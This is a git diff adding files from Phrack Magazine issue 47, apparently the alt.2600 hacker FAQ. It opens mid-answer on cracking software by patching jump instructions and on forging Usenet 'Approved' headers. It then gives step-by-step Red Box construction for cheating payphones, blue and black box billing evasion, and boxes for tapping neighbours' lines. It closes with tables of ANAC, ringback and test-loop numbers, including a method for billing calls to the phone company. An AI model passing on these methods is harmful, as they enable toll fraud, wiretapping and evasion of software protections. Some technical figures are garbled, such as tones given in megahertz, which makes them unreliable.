+can be changed from JE (Jump on Equal) or JNE (Jump On Not Equal) to
+JMP (Jump Unconditionally).  Or the code may simply be replaced with
+NOP (No Operation) instructions.
+
+
+32. What is 127.0.0.1?
+
+127.0.0.1 is a loopback network connection.  If you telnet, ftp, etc...
+to it you are connected to your own machine.
+
+
+33. How do I post to a moderated newsgroup?
+
+Usenet messages consist of message headers and message bodies.  The
+message header tells the news software how to process the message.
+Headers can be divided into two types, required and optional. Required
+headers are ones like "From" and "Newsgroups."  Without the required
+headers, your message will not be posted properly.
+
+One of the optional headers is the "Approved" header.  To post to a
+moderated newsgroup, simply add an Approved header line to your
+message header.  The header line should contain the newsgroup
+moderators e-mail address.  To see the correct format for your target
+newsgroup, save a message from the newsgroup and then look at it using
+any text editor.
+
+A "Approved" header line should look like this:
+
+Approved: will@gnu.ai.mit.edu
+
+There cannot not be a blank line in the message header.  A blank line
+will cause any portion of the header after the blank line to be
+interpreted as part of the message body.
+
+For more information, read RFC 1036: Standard for Interchange of
+USENET messages.
+
+
+
+
+Section B: Telephony
+~~~~~~~~~~~~~~~~~~~~
+
+01. What is a Red Box?
+
+When a coin is inserted into a payphone, the payphone emits a set of
+tones to ACTS (Automated Coin Toll System).  Red boxes work by fooling
+ACTS into believing you have actually put money into the phone.  The
+red box simply plays the ACTS tones into the telephone microphone.
+ACTS hears those tones, and allows you to place your call.  The actual
+tones are:
+
+Nickel Signal      1700+2200  0.060s on
+Dime Signal        1700+2200  0.060s on, 0.060s off, twice repeating
+Quarter Signal     1700+2200  33ms on, 33ms off, 5 times repeating
+
+
+02. How do I build a Red Box?
+
+Red boxes are commonly manufactured from modified Radio Shack tone
+dialers, Hallmark greeting cards, or made from scratch from readily
+available electronic components.
+
+To make a Red Box from a Radio Shack 43-141 or 43-146 tone dialer,
+open the dialer and replace the crystal with a new one.  
+The purpose of the new crystal is to cause the * button on your tone
+dialer to create a 1700Mhz and 2200Mhz tone instead of the original
+941Mhz and 1209Mhz tones.  The exact value of the replacement crystal
+should be 6.466806 to create a perfect 1700Mhz tone and 6.513698 to
+create a perfect 2200mhz tone. A crystal close to those values will
+create a tone that easily falls within the loose tolerances of ACTS.
+The most popular choice is the 6.5536Mhz crystal, because it is the
+eaiest to procure.  The old crystal is the large shiny metal component
+labeled "3.579545Mhz."  When you are finished replacing the crystal,
+program the P1 button with five *'s.  That will simulate a quarter
+tone each time you press P1.
+
+
+03. Where can I get a 6.5536Mhz crystal?
+
+Your best bet is a local electronics store.  Radio Shack sells them,
+but they are overpriced and the store must order them in.  This takes
+approximately two weeks.  In addition, many Radio Shack employees do
+not know that this can be done.
+
+Or, you could order the crystal mail order.  This introduces Shipping
+and Handling charges, which are usually much greater than the price of
+the crystal.  It's best to get several people together to share the
+S&H cost.  Or, buy five or six yourself and sell them later.  Some of
+the places you can order crystals are:
+
+Digi-Key
+701 Brooks Avenue South
+P.O. Box 677
+Thief River Falls, MN 56701-0677
+(80)344-4539
+Part Number:X415-ND    /* Note: 6.500Mhz and only .197 x .433 x .149! */
+Part Number:X018-ND
+
+JDR Microdevices:
+2233 Branham Lane
+San Jose, CA 95124
+(800)538-5000
+Part Number: 6.5536MHZ
+
+Tandy Express Order Marketing
+401 NE 38th Street
+Fort Worth, TX 76106
+(800)241-8742
+Part Number: 10068625
+
+Alltronics
+2300 Zanker Road
+San Jose CA 95131
+(408)943-9774 Voice
+(408)943-9776 Fax
+(408)943-0622 BBS
+Part Number: 92A057
+
+
+04. Which payphones will a Red Box work on?
+
+Red Boxes will work on TelCo owned payphones, but not on COCOT's
+(Customer Owned Coin Operated Telephones).
+
+Red boxes work by fooling ACTS (Automated Coin Toll System) into
+believing you have put money into the pay phone.  ACTS is the
+telephone company software responsible for saying "Please deposit XX
+cents" and listening for the coins being deposited.
+
+COCOT's do not use ACTS.  On a COCOT, the pay phone itself is
+responsible for determining what coins have been inserted.
+
+
+05. How do I make local calls with a Red Box?
+
+Payphones do not use ACTS for local calls.  To use your red box for
+local calls, you have to fool ACTS into getting involved in the call.
+
+One way to do this, in some areas, is by dialing 10288-xxx-xxxx.  This
+makes your call a long distance call, and brings ACTS into the
+picture.
+
+In other areas, you can call Directory Assistance and ask for the
+number of the person you are trying to reach.  The operator will give
+you the number and then you will hear a message similar to "Your call
+can be completed automatically for an additional 35 cents."  When this
+happens, you can then use ACTS tones.
+
+
+06. What is a Blue Box?
+
+Blue boxes use a 2600hz tone to size control of telephone switches
+that use in-band signalling.  The caller may then access special
+switch functions, with the usual purpose of making free long distance
+phone calls, using the tones provided by the Blue Box.
+
+
+07. Do Blue Boxes still work?
+
+Blue Boxes still work in areas using in band signalling.  Modern phone
+switches use out of band signalling.  Nothing you send over the voice
+portion of bandwidth can control the switch.  If you are in an area
+served by a switch using out of band signalling, you can still blue
+box by calling through an area served by older in-band equipment.
+
+
+08. What is a Black Box?
+
+A Black Box is a 1.8k ohm resistor placed across your phone line to
+cause the phone company equipment to be unable to detect that you have
+answered your telephone.  People who call you will then not be billed
+for the telephone call.  Black boxes do not work under ESS.
+
+
+09. What do all the colored boxes do?
+
+Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
+	     Call Forwarding on old 4-wire phone systems
+Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
+Beige        Lineman's hand set
+Black        Allows the calling party to not be billed for the call
+	     placed
+Blast        Phone microphone amplifier
+Blotto       Supposedly shorts every fone out in the immediate area
+Blue         Emulate a true operator by seizing a trunk with a 2600hz
+	     tone
+Brown        Create a party line from 2 phone lines
+Bud          Tap into your neighbors phone line
+Chartreuse   Use the electricity from your phone line
+Cheese       Connect two phones to create a diverter
+Chrome       Manipulate Traffic Signals by Remote Control
+Clear        A telephone pickup coil and a small amp used to make free
+	     calls on Fortress Phones
+Color        Line activated telephone recorder
+Copper       Cause crosstalk interference on an extender
+Crimson      Hold button
+Dark         Re-route outgoing or incoming calls to another phone
+Dayglo       Connect to your neighbors phone line
+Divertor     Re-route outgoing or incoming calls to another phone
+DLOC         Create a party line from 2 phone lines
+Gold         Dialout router
+Green        Emulate the Coin Collect, Coin Return, and Ringback tones
+Infinity     Remotely activated phone tap
+Jack         Touch-Tone key pad
+Light        In-use light
+Lunch        AM transmitter
+Magenta      Connect a remote phone line to another remote phone line
+Mauve        Phone tap without cutting into a line
+Neon         External microphone
+Noise        Create line noise
+Olive        External ringer
+Party        Create a party line from 2 phone lines
+Pearl        Tone generator
+Pink         Create a party line from 2 phone lines
+Purple       Telephone hold button
+Rainbow      Kill a trace by putting 120v into the phone line (joke)
+Razz         Tap into your neighbors phone
+Red          Make free phone calls from pay phones by generating
+	     quarter tones
+Rock         Add music to your phone line
+Scarlet      Cause a neighbors phone line to have poor reception
+Silver       Create the DTMF tones for A, B, C and D
+Static       Keep the voltage on a phone line high
+Switch       Add hold, indicator lights, conferencing, etc..
+Tan          Line activated telephone recorder
+Tron         Reverse the phase of power to your house, causing your
+	     electric meter to run slower
+TV Cable     "See" sound waves on your TV
+Urine        Create a capacitative disturbance between the ring and
+	     tip wires in another's telephone headset
+Violet       Keep a payphone from hanging up
+White        Portable DTMF keypad
+Yellow       Add an extension phone
+
+Box schematics may be retrieved from these FTP sites:
+
+ftp.netcom.com          /pub/br/bradleym
+ftp.netcom.com          /pub/va/vandal
+ftp.winternet.com       /users/craigb
+
diff --git a/phrack47/7.txt b/phrack47/7.txt
new file mode 100644
index 0000000..9accea5
--- /dev/null
+++ b/phrack47/7.txt
@@ -0,0 +1,1260 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 7 of 22
+
+
+10. What is an ANAC number?
+
+An ANAC (Automatic Number Announcement Circuit) number is a telephone
+number that plays back the number of the telephone that called it.
+ANAC numbers are convenient if you want to know the telephone number
+of a pair of wires.
+
+
+11. What is the ANAC number for my area?
+
+How to find your ANAC number:
+
+Look up your NPA (Area Code) and try the number listed for it. If that
+fails, try 1 plus the number listed for it.  If that fails, try the
+common numbers like 311, 958 and 200-222-2222.  If you find the ANAC
+number for your area, please let us know.
+
+Note that many times the ANAC number will vary for different switches
+in the same city.  The geographic naming on the list is NOT intended
+to be an accurate reference for coverage patterns, it is for
+convenience only.
+
+Many companies operate 800 number services which will read back to you
+the number from which you are calling.  Many of these require
+navigating a series of menus to get the phone number you are looking
+for.
+
+  (800)238-4959   A voice mail system
+  (800)328-2630   A phone sex line
+  (800)568-3197   Info Access Telephone Company's Automated Blocking Line
+  (800)571-8859   A phone sex line
+  (800)692-6447   (800)MY-ANI-IS
+  (800)769-3766   Duke Power Company Automated Outage System
+  (800)455-3256   Unknown
+
+An non-800 ANAC that works nationwide is 404-988-9664.  The one catch
+with this number is that it must be dialed with the AT&T Carrier
+Access Code 10732.
+
+Another non-800 nationwide ANAC is Glen Robert of Full Disclosure
+Magazine's number, 10555-1-708-356-9646.
+
+Please use local ANAC numbers if you can, as abuse or overuse kills
+800 ANAC numbers.
+
+  NPA  ANAC number      Geographic area
+  ---  ---------------  ---------------------------------------------
+  201  958              Hackensack/Jersey City/Newark/Paterson, NJ
+  202  811              District of Columbia
+  203  970              CT
+  205  300-222-2222     Birmingham, AL
+  205  300-555-5555     Many small towns in AL
+  205  300-648-1111     Dora, AL
+  205  300-765-4321     Bessemer, AL
+  205  300-798-1111     Forestdale, AL
+  205  300-833-3333     Birmingham
+  205  557-2311         Birmingham, AL
+  205  811              Pell City/Cropwell/Lincoln, AL
+  205  841-1111         Tarrant, AL
+  205  908-222-2222     Birmingham, AL
+  206  411              WA (Not US West)
+  207  958              ME
+  209  830-2121         Stockton, CA
+  209  211-9779         Stockton, CA
+  212  958              Manhattan, NY
+  213  114              Los Angeles, CA (GTE)
+  213  1223             Los Angeles, CA (Some 1AESS switches)
+  213  211-2345         Los Angeles, CA (English response)
+  213  211-2346         Los Angeles, CA (DTMF response)
+  213  760-2???         Los Angeles, CA (DMS switches)
+  213  61056            Los Angeles, CA
+  214  570              Dallas, TX
+  214  790              Dallas, TX (GTE)
+  214  970-222-2222     Dallas, TX
+  214  970-611-1111     Dallas, TX (Southwestern Bell)
+  215  410-xxxx         Philadelphia, PA
+  215  511              Philadelphia, PA
+  215  958              Philadelphia, PA
+  216  331              Akron/Canton/Cleveland/Lorain/Youngstown, OH
+  217  200-xxx-xxxx     Champaign-Urbana/Springfield, IL
+  219  550              Gary/Hammond/Michigan City/Southbend, IN
+  219  559              Gary/Hammond/Michigan City/Southbend, IN
+  301  958-9968         Hagerstown/Rockville, MD
+  310  114              Long Beach, CA (On many GTE switches)
+  310  1223             Long Beach, CA (Some 1AESS switches)
+  310  211-2345         Long Beach, CA (English response)
+  310  211-2346         Long Beach, CA (DTMF response)
+  312  200              Chicago, IL
+  312  290              Chicago, IL
+  312  1-200-8825       Chicago, IL (Last four change rapidly)
+  312  1-200-555-1212   Chicago, IL
+  313  200-200-2002     Ann Arbor/Dearborn/Detroit, MI
+  313  200-222-2222     Ann Arbor/Dearborn/Detroit, MI
+  313  200-xxx-xxxx     Ann Arbor/Dearborn/Detroit, MI
+  313  200200200200200  Ann Arbor/Dearborn/Detroit, MI
+  314  410-xxxx#        Columbia/Jefferson City/St.Louis, MO
+  315  953              Syracuse/Utica, NY
+  315  958              Syracuse/Utica, NY
+  315  998              Syracuse/Utica, NY
+  317  310-222-2222     Indianapolis/Kokomo, IN
+  317  559-222-2222     Indianapolis/Kokomo, IN
+  317  743-1218         Indianapolis/Kokomo, IN
+  401  200-200-4444     RI
+  401  222-2222         RI
+  402  311              Lincoln, NE
+  404  311              Atlanta, GA
+  404  940-xxx-xxxx     Atlanta, GA
+  404  990              Atlanta, GA
+  405  890-7777777      Enid/Oklahoma City, OK
+  405  897              Enid/Oklahoma City, OK
+  407  200-222-2222     Orlando/West Palm Beach, FL
+  408  300-xxx-xxxx     San Jose, CA
+  408  760              San Jose, CA
+  408  940              San Jose, CA
+  409  951              Beaumont/Galveston, TX
+  409  970-xxxx         Beaumont/Galveston, TX
+  410  200-6969         A
+  410  200-555-1212     A
+  410  811              Annapolis/Baltimore, MD
+  412  711-6633         Pittsburgh, PA
+  412  711-4411         Pittsburgh, PA
+  412  999-xxxx         Pittsburgh, PA
+  413  958              Pittsfield/Springfield, MA
+  413  200-555-5555     Pittsfield/Springfield, MA
+  414  330-2234         Fond du Lac/Green Bay/Milwaukee/Racine, WI
+  415  200-555-1212     San Francisco, CA
+  415  211-2111         San Francisco, CA
+  415  2222             San Francisco, CA
+  415  640              San Francisco, CA
+  415  760-2878         San Francisco, CA
+  415  7600-2222        San Francisco, CA
+  419  311              Toledo, OH
+  502  2002222222       Frankfort/Louisville/Paducah/Shelbyville, KY
+  502  997-555-1212     Frankfort/Louisville/Paducah/Shelbyville, KY
+  503  611              Portland, OR
+  503  999              Portland, OR (GTE)
+  504  99882233         Baton Rouge/New Orleans, LA
+  504  201-269-1111     Baton Rouge/New Orleans, LA
+  504  998              Baton Rouge/New Orleans, LA
+  504  99851-0000000000 Baton Rouge/New Orleans, LA
+  508  958              Fall River/New Bedford/Worchester, MA
+  508  200-222-1234     Fall River/New Bedford/Worchester, MA
+  508  200-222-2222     Fall River/New Bedford/Worchester, MA
+  508  26011            Fall River/New Bedford/Worchester, MA
+  509  560              Spokane/Walla Walla/Yakima, WA
+  512  830              Austin/Corpus Christi, TX
+  512  970-xxxx         Austin/Corpus Christi, TX
+  515  5463             Des Moines, IA
+  515  811              Des Moines, IA
+  516  958              Hempstead/Long Island, NY
+  516  968              Hempstead/Long Island, NY
+  517  200-222-2222     Bay City/Jackson/Lansing, MI
+  517  200200200200200  Bay City/Jackson/Lansing, MI
+  518  997              Albany/Schenectady/Troy, NY
+  518  998              Albany/Schenectady/Troy, NY
+  603  200-222-2222     NH
+  606  997-555-1212     Ashland/Winchester, KY
+  606  711              Ashland/Winchester, KY
+  607  993              Binghamton/Elmira, NY
+  609  958              Atlantic City/Camden/Trenton/Vineland, NJ
+  610  958              Allentown/Reading, PA
+  612  511              Minneapolis/St.Paul, MN
+  614  200              Columbus/Steubenville, OH
+  614  571              Columbus/Steubenville, OH
+  615  200200200200200  Chatanooga/Knoxville/Nashville, TN
+  615  2002222222       Chatanooga/Knoxville/Nashville, TN
+  615  830              Nashville, TN
+  616  200-222-2222     Battle Creek/Grand Rapids/Kalamazoo, MI
+  617  200-222-1234     Boston, MA
+  617  200-222-2222     Boston, MA
+  617  200-444-4444     Boston, MA (Woburn, MA)
+  617  220-2622         Boston, MA
+  617  958              Boston, MA
+  618  200-xxx-xxxx     Alton/Cairo/Mt.Vernon, IL
+  618  930              Alton/Cairo/Mt.Vernon, IL
+  619  211-2001         San Diego, CA
+  703  811              Alexandria/Arlington/Roanoke, VA
+  704  311              Asheville/Charlotte, NC
+  708  1-200-555-1212   Chicago/Elgin, IL
+  708  1-200-8825       Chicago/Elgin, IL (Last four change rapidly)
+  708  200-6153         Chicago/Elgin, IL
+  708  724-9951         Chicago/Elgin, IL
+  708  356-9646         Chicago/Elgin, IL
+  713  380              Houston, TX
+  713  970-xxxx         Houston, TX
+  713  811              Humble, TX
+  714  114              Anaheim, CA (GTE)
+  714  211-2121         Anaheim, CA (PacBell)
+  714  211-2222         Anaheim, CA (Pacbell)
+  716  511              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
+  716  990              Buffalo/Niagara Falls/Rochester, NY (Rochester Tel)
+  717  958              Harrisburg/Scranton/Wilkes-Barre, PA
+  718  958              Bronx/Brooklyn/Queens/Staten Island, NY
+  802  2-222-222-2222   Vermont
+  802  200-222-2222     Vermont
+  802  1-700-222-2222   Vermont
+  802  111-2222         Vermont
+  805  114              Bakersfield/Santa Barbara, CA
+  805  211-2345         Bakersfield/Santa Barbara, CA
+  805  211-2346         Bakersfield/Santa Barbara, CA (Returns DTMF)
+  805  830              Bakersfield/Santa Barbara, CA
+  806  970-xxxx         Amarillo/Lubbock, TX
+  810  200200200200200  Flint/Pontiac/Southfield/Troy, MI
+  812  410-555-1212     Evansville, IN
+  813  311              Ft. Meyers/St. Petersburg/Tampa, FL
+  815  200-xxx-xxxx     La Salle/Rockford, IL
+  815  290              La Salle/Rockford, IL
+  817  211              Ft. Worth/Waco, TX
+  817  970-611-1111     Ft. Worth/Waco, TX  (Southwestern Bell)
+  818  1223             Pasadena, CA (Some 1AESS switches)
+  818  211-2345         Pasadena, CA (English response)
+  818  211-2346         Pasadena, CA (DTMF response)
+  903  970-611-1111     Denison, TX
+  906  1-200-222-2222   Marquette/Sault Ste. Marie, MI
+  908  958              New Brunswick, NJ
+  910  200              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
+  910  311              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
+  910  988              Fayetteville/Greensboro/Raleigh/Winston-Salem, NC
+  914  990-1111         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
+  915  970-xxxx         Abilene/El Paso, TX
+  916  211-2222         Sacramento, CA (Pac Bell)
+  916  461              Sacramento, CA (Roseville Telepohone)
+  919  200              Durham, NC
+  919  711              Durham, NC
+
+  Canada:
+  204  644-xxxx         Manitoba
+  306  115              Saskatchewan, Canada
+  403  311              Alberta, Yukon and N.W. Territory
+  403  908-222-2222     Alberta, Yukon and N.W. Territory
+  403  999              Alberta, Yukon and N.W. Territory
+  416  997-xxxx         Toronto, Ontario
+  506  1-555-1313       New Brunswick
+  514  320-xxxx         Montreal, Quebec
+  519  320-xxxx         London, Ontario
+  604  1116             British Columbia, Canada
+  604  1211             British Columbia, Canada
+  604  211              British Columbia, Canada
+  613  320-2232         Ottawa, Ontario
+  705  320-4567         North Bay/Saulte Ste. Marie, Ontario
+
+  Australia:
+  +61  03-552-4111      Victoria 03 area
+  +612 19123            All major capital cities
+
+  United Kingdom:
+  175
+
+
+12. What is a ringback number?
+
+A ringback number is a number that you call that will immediately
+ring the telephone from which it was called.
+
+In most instances you must call the ringback number, quickly hang up
+the phone for just a short moment and then let up on the switch, you
+will then go back off hook and hear a different tone.  You may then
+hang up.  You will be called back seconds later.
+
+
+13. What is the ringback number for my area?
+
+An 'x' means insert those numbers from the phone number from which you
+are calling.  A '?' means that the number varies from switch to switch
+in the area, or changes from time to time.  Try all possible
+combinations.
+
+If the ringback for your NPA is not listed, try common ones such as
+954, 957 and 958.  Also, try using the numbers listed for other NPA's
+served by your telephone company.
+
+  NPA  Ringback number  Geographic area
+  ---  ---------------  ---------------------------------------------
+  201  55?-xxxx         Hackensack/Jersey City/Newark/Paterson, NJ
+  202  958-xxxx         District of Columbia
+  203  99?-xxxx         CT
+  208  99xxx-xxxx       ID
+  213  1-95x-xxxx       Los Angeles, CA
+  219  571-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
+  219  777-xxx-xxxx     Gary/Hammond/Michigan City/Southbend, IN
+  301  579-xxxx         Hagerstown/Rockville, MD
+  301  958-xxxx         Hagerstown/Rockville, MD
+  303  99X-xxxx         Grand Junction, CO
+  304  998-xxxx         WV
+  305  999-xxxx         Ft. Lauderdale/Key West/Miami, FL
+  312  511-xxxx         Chicago, IL
+  312  511-xxx-xxxx     Chicago, IL
+  312  57?-xxxx         Chicago, IL
+  315  98x-xxxx         Syracuse/Utica, NY
+  317  777-xxxx         Indianapolis/Kokomo, IN
+  317  yyy-xxxx         Indianapolis/Kokomo, IN (y=3rd digit of phone number)
+  319  79x-xxxx         Davenport/Dubuque, Iowa
+  401  98?-xxxx         RI
+  404  450-xxxx         Atlanta, GA
+  407  988-xxxx         Orlando/West Palm Beach, FL
+  412  985-xxxx         Pittsburgh, PA
+  414  977-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
+  414  978-xxxx         Fond du Lac/Green Bay/Milwaukee/Racine, WI
+  415  350-xxxx         San Francisco, CA
+  417  551-xxxx         Joplin/Springfield, MO
+  501  221-xxx-xxxx     AR
+  501  721-xxx-xxxx     AR
+  502  988              Frankfort/Louisville/Paducah/Shelbyville, KY
+  503  541-XXXX         OR
+  504  99x-xxxx         Baton Rouge/New Orleans, LA
+  504  9988776655       Baton Rouge/New Orleans, LA
+  505  59?-xxxx         New Mexico
+  512  95X-xxxx         Austin, TX
+  513  99?-xxxx         Cincinnati/Dayton, OH
+  513  955-xxxx         Cincinnati/Dayton, OH
+  516  660-xxx-xxxx     Hempstead/Long Island, NY
+  601  777-xxxx         MS
+  609  55?-xxxx         Atlantic City/Camden/Trenton/Vineland, NJ
+  612  511              Minneapolis/St.Paul, MN
+  612  999-xxx-xxxx     Minneapolis/St.Paul, MN
+  614  998-xxxx         Columbus/Steubenville, OH
+  615  930-xxxx         Chatanooga/Knoxville/Nashville, TN
+  616  946-xxxx         Battle Creek/Grand Rapids/Kalamazoo, MI
+  619  331-xxxx         San Diego, CA
+  619  332-xxxx         San Diego, CA
+  703  958-xxxx         Alexandria/Arlington/Roanoke, VA
+  708  511-xxxx         Chicago/Elgin, IL
+  714  330?             Anaheim, CA (GTE)
+  714  33?-xxxx         Anaheim, CA (PacBell)
+  716  981-xxxx         Rochester, NY (Rochester Tel)
+  718  660-xxxx         Bronx/Brooklyn/Queens/Staten Island, NY
+  719  99x-xxxx         Colorado Springs/Leadville/Pueblo, CO
+  801  938-xxxx         Utah
+  801  939-xxxx         Utah
+  802  987-xxxx         Vermont
+  804  260              Charlottesville/Newport News/Norfolk/Richmond, VA
+  805  114              Bakersfield/Santa Barbara, CA
+  805  980-xxxx         Bakersfield/Santa Barbara, CA
+  810  951-xxx-xxxx     Pontiac/Southfield/Troy, MI
+  813  711              Ft. Meyers/St. Petersburg/Tampa, FL
+  817  971              Ft. Worth/Waco, TX (Flashhook, then 2#)
+  906  951-xxx-xxxx     Marquette/Sault Ste. Marie, MI
+  908  55?-xxxx         New Brunswick, NJ
+  908  953              New Brunswick, NJ
+  913  951-xxxx         Lawrence/Salina/Topeka, KS
+  914  660-xxxx         Peekskill/Poughkeepsie/White Plains/Yonkers, NY
+
+  Canada:
+  416  57x-xxxx         Toronto, Ontario
+  416  99x-xxxx         Toronto, Ontario
+  416  999-xxx-xxxx     Toronto, Ontario
+  506  572+xxx-xxxx     New Brunswick
+  514  320-xxx-xxxx     Montreal, Quebec
+  613  999-xxx-xxxx     Ottawa, Ontario
+  705  999-xxx-xxxx     North Bay/Saulte Ste. Marie, Ontario
+
+  Australia: +61 199
+  Brazil: 199
+  New Zealand: 137
+  Sweden: 0058
+  United Kingdom: 174 or 1744 or 175 or 0500-89-0011
+
+
+14. What is a loop?
+
+This FAQ answer is excerpted from: ToneLoc v0.99 User Manual
+				   by Minor Threat & Mucho Maas
+
+Loops are a pair of phone numbers, usually consecutive, like 836-9998
+and 836-9999.  They are used by the phone company for testing.  What
+good do loops do us?  Well, they are cool in a few ways.  Here is a
+simple use of loops.  Each loop has two ends, a 'high' end, and a
+'low' end.  One end gives a (usually) constant, loud tone when it is
+called. The other end is silent.  Loops don't usually ring either.
+When BOTH ends are called, the people that called each end can talk
+through the loop.  Some loops are voice filtered and won't pass
+anything but a constant tone; these aren't much use to you.  Here's
+what you can use working loops for:  billing phone calls!  First, call
+the end that gives the loud tone.  Then if the operator or someone
+calls the other end, the tone will go quiet.  Act like the phone just
+rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or
+what the fuck ever.  The operator thinks that she just called you, and
+that's it!  Now the phone bill will go to the loop, and your local
+RBOC will get the bill!  Use this technique in moderation, or the loop
+may go down.  Loops are probably most useful when you want to talk to
+someone to whom you don't want to give your phone number.
+
+
+15. What is a loop in my area?
+
+Many of these loops are no longer functional.  If you are local
+to any of these loops, please try them out an e-mail me the results
+of your research.
+
+  NPA    High      Low
+  ---  --------  --------
+  201  228-9929  228-9930
+  201  238-9929  238-9930
+  201  251-9929  251-9930
+  201  254-9929  254-9930
+  201  272-9929  272-9930
+  201  330-9929  330-9930
+  201  333-9929  333-9930
+  201  339-9929  339-9930
+  201  347-9929  347-9930
+  201  376-9929  376-9930
+  201  398-9929  398-9930
+  201  467-9929  467-9930
+  201  528-9929  528-9930
+  201  531-9929  531-9930
+  201  558-9929  558-9930
+  201  559-9929  559-9930
+  201  560-9929  560-9930
+  201  592-9929  592-9930
+  201  625-9929  625-9930
+  201  631-9929  631-9930
+  201  637-9929  637-9930
+  201  655-9929  655-9930
+  201  666-9929  666-9930
+  201  690-9929  690-9930
+  201  761-9929  761-9930
+  201  762-9929  762-9929
+  201  762-9929  762-9930
+  201  763-9929  763-9930
+  201  764-9929  764-9930
+  201  767-9929  767-9930
+  201  768-9929  768-9930
+  201  773-9929  773-9930
+  201  879-9929  879-9930
+  201  938-9929  938-9930
+  201  946-9929  946-9930
+  201  992-9929  992-9930
+  201  993-9929  993-9930
+  201  994-9929  994-9930
+  206  827-0018  827-0019
+  206  988-0020  988-0022
+  208  862-9996  862-9997
+  209  732-0044  732-0045
+  201  666-9929  666-9930
+  210  993-9929  993-9930
+  210  330-9929  330-9930
+  210  333-9929  333-9930
+  210  376-9929  376-9930
+  210  467-9929  467-9930
+  212  220-9977  220-9979
+  212  283-9977  283-9979
+  212  283-9977  283-9997
+  212  352-9900  352-9906
+  212  365-9977  365-9979
+  212  529-9900  529-9906
+  212  562-9977  562-9979
+  212  986-9977  986-9979
+  213  360-1118  360-1119
+  213  365-1118  365-1119
+  213  455-0002  455-XXXX
+  213  455-0002  455-xxxx
+  213  546-0002  546-XXXX
+  213  546-0002  546-xxxx
+  213  549-1118  549-1119
+  214  291-4759  291-4757
+  214  299-4759  299-4757
+  305  778-9952  778-9951
+  305  964-9951  964-9952
+  307  468-9999  468-9998
+  308  357-0004  357-0005
+  310  365-1118  365-1119
+  310  445-0002  445-????
+  310  455-0002  455-????
+  310  545-0002  545-????
+  310  546-0002  546-????
+  312  262-9902  262-9903
+  313  224-9996  224-9997
+  313  225-9996  225-9997
+  313  234-9996  234-9997
+  313  237-9996  237-9997
+  313  256-9996  256-9997
+  313  272-9996  272-9997
+  313  273-9996  273-9997
+  313  277-9996  277-9997
+  313  281-9996  281-9997
+  313  292-9996  292-9997
+  313  299-9996  299-9997
+  313  321-9996  321-9997
+  313  326-9996  326-9997
+  313  356-9996  356-9997
+  313  362-9996  362-9997
+  313  369-9996  369-9997
+  313  388-9996  388-9997
+  313  397-9996  397-9997
+  313  399-9996  399-9997
+  313  445-9996  445-9997
+  313  465-9996  465-9997
+  313  471-9996  471-9997
+  313  474-9996  474-9997
+  313  477-9996  477-9997
+  313  478-9996  478-9997
+  313  483-9996  483-9997
+  313  497-9996  497-9997
+  313  526-9996  526-9997
+  313  552-9996  552-9997
+  313  556-9996  556-9997
+  313  561-9996  561-9997
+  313  569-9996  569-9996
+  313  575-9996  575-9997
+  313  577-9996  577-9997
+  313  585-9996  585-9997
+  313  591-9996  591-9997
+  313  621-9996  621-9997
+  313  626-9996  626-9997
+  313  644-9996  644-9997
+  313  646-9996  646-9997
+  313  647-9996  647-9997
+  313  649-9996  649-9997
+  313  663-9996  663-9997
+  313  665-9996  665-9997
+  313  683-9996  683-9997
+  313  721-9996  721-9997
+  313  722-9996  722-9997
+  313  728-9996  728-9997
+  313  731-9996  731-9997
+  313  751-9996  751-9997
+  313  776-9996  776-9997
+  313  781-9996  781-9997
+  313  787-9996  787-9997
+  313  822-9996  822-9997
+  313  833-9996  833-9997
+  313  851-9996  851-9997
+  313  871-9996  871-9997
+  313  875-9996  875-9997
+  313  886-9996  886-9997
+  313  888-9996  888-9997
+  313  898-9996  898-9997
+  313  934-9996  934-9997
+  313  942-9996  942-9997
+  313  963-9996  963-9997
+  313  977-9996  977-9997
+  315  673-9995  673-9996
+  315  695-9995  695-9996
+  402  422-0001  422-0002
+  402  422-0003  422-0004
+  402  422-0005  422-0006
+  402  422-0007  422-0008
+  402  572-0003  572-0004
+  402  779-0004  779-0007
+  406  225-9902  225-9903
+  517  422-9996  422-9997
+  517  423-9996  423-9997
+  517  455-9996  455-9997
+  517  563-9996  563-9997
+  517  663-9996  663-9997
+  517  851-9996  851-9997
+  609  921-9929  921-9930
+  609  994-9929  994-9930
+  616  997-9996  997-9997
+  708  724-9951  724-????
+  713  224-1499  759-1799
+  713  324-1499  324-1799
+  713  342-1499  342-1799
+  713  351-1499  351-1799
+  713  354-1499  354-1799
+  713  356-1499  356-1799
+  713  442-1499  442-1799
+  713  447-1499  447-1799
+  713  455-1499  455-1799
+  713  458-1499  458-1799
+  713  462-1499  462-1799
+  713  466-1499  466-1799
+  713  468-1499  468-1799
+  713  469-1499  469-1799
+  713  471-1499  471-1799
+  713  481-1499  481-1799
+  713  482-1499  482-1799
+  713  484-1499  484-1799
+  713  487-1499  487-1799
+  713  489-1499  489-1799
+  713  492-1499  492-1799
+  713  493-1499  493-1799
+  713  524-1499  524-1799
+  713  526-1499  526-1799
+  713  555-1499  555-1799
+  713  661-1499  661-1799
+  713  664-1499  664-1799
+  713  665-1499  665-1799
+  713  666-1499  666-1799
+  713  667-1499  667-1799
+  713  682-1499  976-1799
+  713  771-1499  771-1799
+  713  780-1499  780-1799
+  713  781-1499  997-1799
+  713  960-1499  960-1799
+  713  977-1499  977-1799
+  713  988-1499  988-1799
+  805  528-0044  528-0045
+  805  544-0044  544-0045
+  805  773-0044  773-0045
+  808  235-9907  235-9908
+  808  239-9907  239-9908
+  808  245-9907  245-9908
+  808  247-9907  247-9908
+  808  261-9907  261-9908
+  808  322-9907  322-9908
+  808  328-9907  328-9908
+  808  329-9907  329-9908
+  808  332-9907  332-9908
+  808  335-9907  335-9908
+  808  572-9907  572-9908
+  808  623-9907  623-9908
+  808  624-9907  624-9908
+  808  668-9907  668-9908
+  808  742-9907  742-9908
+  808  879-9907  879-9908
+  808  882-9907  882-9908
+  808  885-9907  885-9908
+  808  959-9907  959-9908
+  808  961-9907  961-9908
+  810  362-9996  362-9997
+  813  385-9971  385-xxxx
